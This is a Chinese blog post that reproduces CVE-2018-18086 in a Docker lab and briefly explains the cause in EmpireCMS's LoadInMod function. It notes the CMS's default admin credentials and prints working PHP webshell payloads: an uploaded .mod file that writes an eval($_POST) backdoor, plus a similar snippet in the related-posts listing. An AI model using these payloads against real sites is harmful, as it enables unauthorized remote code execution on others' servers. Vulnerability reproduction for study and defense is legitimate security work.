帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现

已于 2022-09-13 23:32:36 修改
阅读量3.2k 收藏 5
点赞数 1
分类专栏: 漏洞复现
于 2022-09-13 12:12:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55793759/article/details/126711655
版权

php 安全 web安全

文章目录

一、简述👋

  • 漏洞描述
    EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行,EmpireCMS7.5版本中的/e/class/moddofun.php文件的LoadInMod函数存在安全漏洞,攻击者可利用该漏洞上传任意文件,该漏洞编号为CVE-2018-18086

  • 影响版本
    EmpireCMS<=7.5

  • 官方下载EmpireCMS V7.5
    下载地址:http://www.phome.net/download/

二、安装环境👋

  • docker拉取镜像empirecms-cve_2018_18086

在这里插入图片描述

  • 创建容器

在这里插入图片描述

  • 如果对docker安装不熟悉,可以参考文章:Centos使用Docker搭建Lamp环境,一步到位

  • 这样打开网站IP后,发现直接就是根目录,我们需要把/var/www/html/empirecms目录里的文件复制到/var/www/html/去,避免暴露根目录

三、漏洞复现👋

1、直接在empirecms/e/admin下打开管理后台

在这里插入图片描述

2、在爆破或账号密码进入后台后(默认账号密码为admin/123456)

在这里插入图片描述

3、依次点开系统,打开管理数据表,选择导入系统模型

新建shell.php.mod文件并上传,文件内容如下:

file_put_contents("1shell.php",<?php phpinfo();?>);

在这里插入图片描述

4、在导入文件后

生成的1shell.php文件在/admin目录下,即可访问empirecms/e/admin/shell.php

在这里插入图片描述
5、同时,如果为了连接蚁剑等,注意$符号需要转义

<?php  
	file_put_contents("getshell.php","<?php @eval(\$_POST[123]);?>");
?>

四、原理分析👋

1、下载安装文件分析,在/e/admin/ecmsmod.php文件下的导入模型

在这里插入图片描述

2、而进入到LoadlnMod函数,来到/e/class/moddofun.php

在这里插入图片描述

  • 标注第一点,判断上传文件类型,文件后缀只能是.mod
  • 标注第二点,上传文件处使用time().make_password(10)进行文件名加密,同时拼接.php作为文件名
  • 标注第三点,用include进行一次包含,执行上传的PHP代码,即可以通过创建文件的代码绕过

3、因为一开始的导入模型文件是在/e/admin目录下,所以创建的shell.php/admin目录下

在这里插入图片描述

迷途羔羊pro
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
帝国cms漏洞分析前台XSS漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 1961
帝国cms漏洞分析前台XSS漏洞 一、帝国cms漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输出。 二、帝国cms漏洞复现 1、需要开启会员空间功能(默认关闭),登录后台开启会员空间功能。
漏洞复现-EmpireCms-文件上传】vulfocus/empirecms-cve_2018_18086
10-09 1802
【EmpireCms-文件上传】帝国建站
2024年网络安全最新Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1)
最新发布
2401_84297899的博客
05-01 245
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
帝国CMS后台getshell
qq_50854662的博客
04-02 659
后台新增页面,写入webshell <?php fputs(fopen("shell.php","a"),'<?php phpinfo();@eval($_POST[cmd]);?>')?> 在后台查看文件写入成功 访问成功 shell工具连接成功 ...
windows server 2012主机漏洞-复现-修复
热门推荐
weixin_42881032的博客
09-16 1万+
windows server 2012 目录windows server 2012Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)复现Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010) Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CV
EmpireCMS_V7.5的一次审计
xiaoi123的博客
10-11 1949
i春秋作家:Qclover 原文来自:EmpireCMS_V7.5的一次审计   EmpireCMS_V7.5的一次审计 1概述    最近在做审计和WAF规则的编写,在CNVD和CNNVD等漏洞平台寻找各类CMS漏洞研究编写规则时顺便抽空对国内一些小的CMS进行了审计,另外也由于代码审计接触时间不是太常,最近一段时间也跟着公司审计项目再次重新的学习代码审计知识,对于入行已久的各位审计...
Web安全 EmpireCMS漏洞常见漏洞分析及复现
2401_84297796的博客
04-28 754
点击下一步就会自动在数据库生成一个empirecms的数据库并在其中建立许多个表然后再设置进入后台管理员的密码下一步即可安装完成,这里提示要删除路径避免被再次安装,但是这个地方其实设置了两层保护,即使你访问install这个路径会有一个.off文件在路径下,需要将这个.off文件删除后才能再次安装输入设置的后台管理员用户名和密码即可进入管理员后台
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析
滴水石穿
03-12 2975
一、漏洞描述 该漏洞是由于安装程序时没有对用户的输入做严格过滤,导致用户输入的可控参数被写入配置文件,造成任意代码执行漏洞。 二、漏洞复现 1、漏洞出现位置如下图,phome_表前缀没有被严格过滤导致攻击者构造恶意的代码 2、定位漏洞出现的位置,发现在/e/install/index.php,下图可以看到表名前缀phome_,将获取表名前缀交给了mydbtbpre参数。 3、全文搜索,$mydbtbpre,然后跟进参数传递,发现将用户前端输入的表前缀替换掉后带入了sql语句进行表的创建,期间并没有对前端
帝国CMS7.5漏洞复现
WFC1006848997的博客
02-06 2205
漏洞描述 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。 这个也是比较鸡肋,还是需要弄到管理员权限,登陆到后台漏洞复现 源码下载地址:http://www.phome.net/download 然后安装,安装可参考源码提供的 html 文件 测试执行到第三步即可 设置好各个参数后登陆后台,准备复现漏洞,按照下列顺序执...
帝国cms empirecms 文件上传 (CVE-2018-18086复现
YouthBelief的博客
11-18 2869
所有文章,仅供安全研究与学习之用,后果自负! 这里写目录标题empirecms 文件上传 (CVE-2018-18086)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 empirecms 文件上传 (CVE-2018-18086) 0x01 漏洞描述 EmpireCMS帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 密码:a
帝国cms弱口令登录(帝国cms后台密码忘记怎么办?)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-29 1671
1、利用帝国cms弱口令登录漏洞描述。EmpireCMS 7.5版本e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 2、利用帝国cms弱口令登录影响范围。EmpireCMS
cms复现
qq_54713392的博客
05-14 184
cms复现 漏洞利用备份数据 访问localhost/EmpireCMS_7.5/EmpireCMS_7.5_SC_UTF8/upload/e/install/index.php进行下载安装 安装完登录 localhost/EmpireCMS_7.5/EmpireCMS_7.5_SC_UTF8/upload/e/admin/admin.php 找到 系统=》备份与恢复数据=》备份数据 在备份文件中随意选择一项,打开代理,点击开始备份进行抓包 备份数据传送的参数如下 tablename数据改为phpin
0x01 #利用Empire复现永生之火后门渗透part1
Tahir_111的博客
07-31 694
0x01 #利用Empire复现永生之火后门渗透part1 0x1 概述 渗透测试神器Empire Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适...
XSS漏洞分析
qq_42741290的博客
05-18 535
一、安装配置DVWA环境 1、安装PHP集成环境——phpstudy 并启动apache和mysql。 2、安装DVWA 把下载好的dvwa安装包解压放到C:\phpstudy_pro\WWW文件夹下 打开config文件夹,打开config.inc.php,修改’db_password’为root。 3、登录DVWA 在浏览器输入http://192.168.74.145/DVWA-master/login.php(建议使用火狐浏览器) Username:admin,Password:passwo
Linux kernel(CVE-2018-17182)提权漏洞复现
06-12
但是,我可以简单地描述一下CVE-2018-17182漏洞的一般性质和可能的攻击方式。 CVE-2018-17182是Linux内核中的一种提权漏洞,攻击者可以利用该漏洞以root权限在系统中执行任意代码。这个漏洞的原因是一个名为"Race ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值